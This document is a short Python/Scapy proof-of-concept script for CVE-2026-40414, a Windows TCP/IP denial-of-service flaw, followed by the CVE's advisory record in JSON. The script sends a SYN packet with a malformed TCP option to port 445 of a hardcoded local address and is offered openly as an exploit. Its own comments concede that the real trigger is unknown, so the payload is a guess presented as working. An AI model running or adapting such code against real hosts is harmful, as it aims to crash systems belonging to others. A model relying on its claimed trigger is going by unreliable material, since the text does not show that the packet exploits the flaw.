CVE-2026-40414

import sys from scapy.all import * # Target IP address on the adjacent network target_ip = "192.168.1.100" def send_exploit(): # Construct a malicious packet to trigger the vulnerability. # This PoC sends a crafted TCP packet. # The specific trigger depends on the exact parsing logic of CVE-2026-40414. # Build IP layer ip_layer = IP(dst=target_ip) # Build TCP layer with potentially malicious options # Malformed options often trigger parsing issues tcp_layer = TCP(dport=445, flags="S", options=[(252, b"\x00"*10)]) # Combine layers packet = ip_layer / tcp_layer # Send the packet send(packet, verbose=0) print(f"[*] Malformed packet sent to {target_ip}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-40414", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:19.350", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in Windows TCP/IP allows an unauthorized attacker to deny service over an adjacent network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40414", "source": "[email protected]"}]}}